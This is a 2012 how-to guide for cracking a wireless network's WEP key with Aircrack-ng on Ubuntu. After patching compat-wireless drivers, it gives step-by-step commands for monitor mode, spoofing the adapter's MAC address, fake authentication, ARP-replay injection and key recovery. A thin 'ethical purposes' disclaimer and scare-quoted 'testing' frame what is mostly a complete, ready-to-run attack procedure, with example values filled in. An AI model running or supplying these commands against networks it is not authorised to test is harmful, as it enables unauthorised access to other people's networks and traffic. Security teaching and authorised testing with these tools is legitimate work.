Aircrack WEP Testing Guide

Sunday, March 25th, 2012

Installing and Using Aircrack-ng

The following guide has been written to help you install and configure Aircrack-ng. It also includes a step by step guide which will help you crack wireless network WEP encryption. This guide should only be used for ethical purposes.

Installation:

Open a new terminal and use the following command to install aircrack-ng:

sudo apt-get install aircrack-ng

Ubuntu will now download and automatically install aircrack-ng.

Compat-Wireless Channel -1 Problem:

Newer versions of Ubuntu 10.04 and up have a problem configuring wireless monitoring devices to listen on a particular wireless channel.  In fact, when attempting to create a wireless device in monitor mode, you will see that the channel is stuck on -1 [an invalid wireless channel number].  This is due to a bug in the packaged compat-wireless drivers built into the kernel of Ubuntu.  The solution is to download, compile, and install the latest compat-wireless driver by using this guide:

Open a new terminal, and use this script:

wget http://www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.3/compat-wireless-3.3-rc6-1.tar.bz2
tar -jxf compat-wireless-3.3-rc6-1.tar.bz2
cd compat-wireless-3.3-rc6-1
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
nano scripts/update-initramfs
#*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build
#*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build
#*** Example: KLIB=/lib/modules/3.1.0/build
make
sudo make install
sudo make wlunload

To find the value for $(uname -r), open a new terminal and type:

uname -r

Use the value you receive for the reference in the above code

Restart your linux machine.

Testing WEP Networks

Stop Conflicting Services:

Open a new terminal and run the following commands:

sudo service network-manager stop
sudo service avahi-daemon stop
sudo service upstart-udev-bridge stop

Retrieve Wireless Devices List:

In a terminal, type the following command:

iwconfig

Now List / Scan All Networks:

Run the following command in the same terminal:

sudo airodump-ng [WIRELESS_DEVICE_NAME_HERE Example: wlan2]

Example:

sudo airodump-ng wlan2

When you're finished, press ctrl+c to stop the scanning process. Save the entire line of information for the network you wish to "test"

Create your monitoring device:

In the same terminal, run this command:

sudo airmon-ng start [WIRELESS_DEVICE_NAME_HERE Example: wlan2] [channel number of wireless access point you want to break]

Example:

sudo airmon-ng start wlan2 11

The above line should create a listening interface on your wireless adapter. Typically, in ubuntu, this is mon0

Change your adapter's MAC address on the listening interface:

Run the following command in the same terminal to change your MAC address:

sudo ifconfig mon0 down
sudo macchanger mon0 --mac=[FAKE_MAC_LIKE AA:22:11:11:11:11]
sudo ifconfig mon0 up

Example:

sudo ifconfig mon0 down
sudo macchanger mon0 --mac=AA:22:11:11:11:11
sudo ifconfig mon0 up

Test Wireless Injection:

Start "testing" the desired access point by running these commands:

In the same terminal, do:

sudo aireplay-ng -9 -e [WIRELESS_NETWORK_NAME] -a [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] mon0

Example:

sudo aireplay-ng -9 -e test -a 00:AE:6B:61:67:F2 mon0

Flags:

-9 means injection test
-e name species wireless network name for test
-a access point MAC address
mon0 is the wireless interface

You can retrieve all of the flag information you need from the output you received by listing networks.

If you receive a message stating "injection is working!" run this command in the same terminal:

sudo airodump-ng -c [ACCESS_POINT_WIRELESS_CHANNEL] --bssid [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] -w [CAPTURE_FILE_NAME] mon0

Example:

sudo airodump-ng -c 11 --bssid 00:AE:6B:61:67:F2 -w output mon0

Flags:

-c 11 is the channel for the wireless network
--bssid [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING]
 -w [CAPTURE_FILE_NAME]

Open a New Terminal and Run This:

sudo aireplay-ng -1 0 -e [WIRELESS_NETWORK_NAME] -a [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] -h [YOUR_FAKED_MAC_ADDRESS_FOR_INTERFACE] mon0

Example:

sudo aireplay-ng -1 0 -e test -a 00:AE:6B:61:67:F2 -h AA:22:11:11:11:11 mon0

Flags:

-1 means fake authentication
0 resassociation timing in seconds
-e [WIRELESS_NETWORK_NAME]
-a [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING]
-h [YOUR_FAKED_MAC_ADDRESS_FOR_INTERFACE]

You should receive a message stating "Authentication Successful"

Open a New Terminal and Run:

sudo aireplay-ng -3 -b [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] -h [FAKED_ADAPTER_MAC_ADDRESS] mon0

Example:

sudo aireplay-ng -3 -b 00:AE:6B:61:67:F2 -h AA:22:11:11:11:11 mon0

Go back to the terminal that shows the beacons scanning information. Under #/s column, when it reaches over 10000, do this:

Open a New Terminal

sudo aircrack-ng -b [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] [CAPTURE_FILE_NAME]*.cap

Example:

sudo aircrack-ng -b 00:AE:6B:61:67:F2 output*.cap

You should receive the key.

Sources:

HackAVision Aircrack WEP / WPA / WPA2 Cracking Guide

Aircrack-ng WEP Cracking Guide